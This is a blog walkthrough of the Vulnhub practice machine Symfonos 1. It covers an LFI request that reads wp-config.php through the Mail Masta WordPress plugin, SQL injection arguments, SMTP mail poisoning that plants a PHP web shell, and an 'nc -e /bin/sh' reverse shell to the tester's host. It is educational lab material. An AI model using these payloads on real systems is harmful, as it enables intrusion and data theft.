---
layout: post
title:  "Vulnhub: Symfonos 1"
date:   2021-02-01 19:00:00 +1100
category: hacking
---

## Symfonos 1
*Beginner real life based machine designed to teach a interesting way of obtaining a low priv shell.*

This box is on the [NetSecFocus Admin list](https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=0) of OSCP-like machines. It's [SYMFONOS: 1](https://www.vulnhub.com/entry/symfonos-1,322/) from Vulnhub. I did not complete it without hints; nothing like getting humbled by a 'beginner' box to bring you back to earth.

But, it was enlightening, so definitely worth the write up although I will skip over a bit of it.

## Ports
1. 22/tcp  open  ssh          syn-ack ttl 64
2. 25/tcp  open  smtp         syn-ack ttl 64
3. 80/tcp  open  http         syn-ack ttl 64
4. 139/tcp open  netbios-ssn  syn-ack ttl 64
5. 445/tcp open  microsoft-ds syn-ack ttl 64

So it's SSH, SMTP, HTTP and SMB

## SMB
There are two directories, one with anonymous access and one without. Without gives us hints that get us to the one requiring authentication, which in turn leads to a hidden web directory: */h3l105*

## h3l105
The website is a Wordpress site. *wpscan* gives me no plugins (passive, mixed or aggressive), and just one user: *admin*. The core version is not known to be vulnerable. I try a password attack with *rockyou*, but it's going nowhere.

This is where (after lots of failing) I went looking for a hint. It turns out there is a vulnerable plugin (Mail Masta), which *wpscan* used to detect but for some reasons doesn't anymore??

It has two vulns; LFI and SQLi.

With a little encoding trick, I can read *wp-config*:

``
GET /h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=php://filter/convert.base64-encode/resource=/var/www/html/h3l105/wp-config.php HTTP/1.1
``

But there is no password reuse going on here. There is also no SSH key, and I can't read the Apache logs.

I use the SQLi to dump the database:

``
-u 'http://symfonos.local:80/h3l105/wp-content/plugins/mail-masta/inc/lists/csvexport.php?list_id=00+OR+1%3D1&pl=/var/www/html/h3l105//wp-load.php' --dump --cookie='wordpress_test_cookie=WP+Cookie+check'
``

But I can't crack the hash. Now what?

## SMTP 
This is the real beauty of this box. You can poison the *helios* account mail with the SMTP service, and use the LFI to get a shell:

{% highlight shell %}
root@kali:/opt/vulnhub/symfonos1# telnet 192.168.1.71 25
Trying 192.168.1.71...
Connected to 192.168.1.71.
Escape character is '^]'.
220 symfonos.localdomain ESMTP Postfix (Debian/GNU)
MAIL FROM: ghost
250 2.1.0 Ok
RCPT TO: Helios
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
<?php system($_GET['cmd']); ?>
.
250 2.0.0 Ok: queued as 5E75540896
{% endhighlight %}

Simple. Beautiful. Totally missed it, lol. Shell time:

``
http:symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=nc -e /bin/sh 192.168.1.150 1234
``

## Privesc
The privesc was a binary calling a system binary (curl) without a path; the only odd part about this was that it worked with */bin/sh* but not with */bin/bash*. That is, it would set the **euid** correctly with *sh*, but not *bash*. Other than that it was not unusual.
